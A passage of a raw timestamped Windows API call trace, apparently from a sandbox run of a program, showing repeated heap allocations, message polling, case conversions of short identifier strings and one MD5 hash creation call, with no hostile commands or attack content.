(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0190.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0190.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0190.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0190.043] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0190.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0190.044] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0190.044] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0190.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0190.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0190.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0190.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0190.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0190.044] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0190.044] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.044] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0190.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0190.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0190.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0190.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0190.044] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.044] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.044] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.045] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0190.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0190.045] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0190.045] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0190.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0190.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0190.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0190.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0190.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0190.045] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0190.045] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.045] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0190.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0190.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0190.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0190.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0190.045] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.045] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0190.046] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0190.046] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0190.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0190.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0190.046] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0190.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0190.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0190.046] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0190.046] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0190.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0190.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0190.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0190.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0190.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0190.046] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0190.046] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.046] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0190.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0190.047] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0190.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0190.047] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0190.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0190.047] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0190.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0190.047] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0190.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0190.047] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0190.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0190.047] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0190.047] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0190.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0190.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0190.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0190.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0190.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0190.048] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0190.048] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.048] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0190.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0190.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0190.048] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0190.048] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0190.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0190.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0190.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0190.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0190.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0190.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0190.048] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0190.048] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0190.048] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0190.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0190.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0190.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0190.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0190.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0190.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0190.049] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.049] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0190.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0190.049] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0190.049] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0190.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0190.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0190.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0190.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0190.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0190.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0190.049] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0190.049] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0190.049] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0190.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0190.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0190.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0190.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0190.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0190.050] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0190.050] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0190.050] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0190.050] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0190.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0190.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0190.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0190.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0190.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0190.050] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0190.050] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0190.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0190.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0190.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0190.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0190.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0190.050] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0190.050] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.051] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0190.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0190.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0190.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0190.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0190.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0190.051] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0190.051] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0190.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0190.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0190.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0190.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0190.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0190.051] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0190.051] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.051] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0190.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0190.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0190.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0190.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0190.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0190.052] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0190.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0190.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0070 [0190.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0190.052] CryptCreateHash (in: hProv=0xaa3868, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0190.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0190.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0190.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0190.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0190.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0190.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0190.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00e0 [0190.052] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0190.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0190.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0190.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0190.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0190.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0190.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0190.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0090 [0190.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0190.053] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.053] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0190.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0190.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0190.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0190.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0190.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0190.053] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0190.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0190.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0190.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0190.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0190.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0190.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0190.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0190.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0190.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0190.054] RtlAllocateHeap 